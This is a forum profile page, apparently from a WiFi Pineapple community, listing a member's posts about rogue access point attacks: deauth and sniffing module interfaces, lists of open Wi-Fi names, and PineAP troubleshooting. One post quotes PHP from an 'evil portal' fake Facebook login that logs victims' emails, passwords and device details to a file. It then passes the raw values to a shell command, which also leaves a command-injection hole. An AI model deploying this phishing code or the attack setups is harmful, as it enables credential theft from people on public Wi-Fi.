Jump to content

JointEffort

Active Members
  • Content Count

    8
  • Joined

  • Last visited

About JointEffort

  • Rank
    Hackling

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Hi all, I have a running Nano with an additional Wifi dongle on wlan2 (client mode). So every device that's connected to my Nano has internet access over wlan2. In several modules you have to specify an interface to use, for example Deauth, p0f, urlsnarf, etc. Which interface should I use? I mean, if every device has accessing the internet goes through wlan2, then that interface should be the one to use, right? And when to use br-lan for example? Regards
  2. Hi there, Does anyone know if there is a list of names of open Wi-Fi networks?
  3. Take a look at the portals at https://github.com/kbeflo/evilportals, for example, see the facebook-login: Snippet: if (isset($_POST['email'])) { $email = isset($_POST['email']) ? $_POST['email'] : 'email'; $pwd = isset($_POST['password']) ? $_POST['password'] : 'password'; $hostname = isset($_POST['hostname']) ? $_POST['hostname'] : 'hostname'; $mac = isset($_POST['mac']) ? $_POST['mac'] : 'mac'; $ip = isset($_POST['ip']) ? $_POST['ip'] : 'ip'; file_put_contents("$dir/evilportal-logs/facebook-login.txt", "[" . date('Y-m-d H:i:s') . "Z]\n" . "email: {$email}\npassword: {$pwd}\nhostname: {$hostname}\nmac: {$mac}\nip: {$ip}\n\n", FILE_APPEND); exec("notify $email' - '$pwd"); }
  4. My bad ? I changed the storage location of the recon.db to /root. After several reconning sessions without cleaning them the fs was simply full
  5. Hi all, I've had it several times now: and it's anoying. After I did a shutdown from the web ui and after unplugging the usb adapter: the nano starts up with a read-only filesystem. Therefore, PineAP won't start automatically, I can't even start it via the web ui. Has anyone encoutered this?
  6. It's a little bit different: the device gets an IP (checked by connecting my phone and checking it's IP address), but the Nano GUI says: "No IP". That's a pitty, because to perform an attack on connected devices, I need to know their address.
  7. Hi there, I got up and running with the nano, and during reconning the SSID pool filled up with SSID's. I even got some clients connected, but they get no IP address. Has anyone an idea? I use OSX High Sierra with Internet Sharing enabled. I changed the network range of the bridge adapter that gets created when enabling Internet Sharing (credits to the guys of Amsys), it is now in the default pineapple range (172.16.42.0/8). Regards
×
×
  • Create New...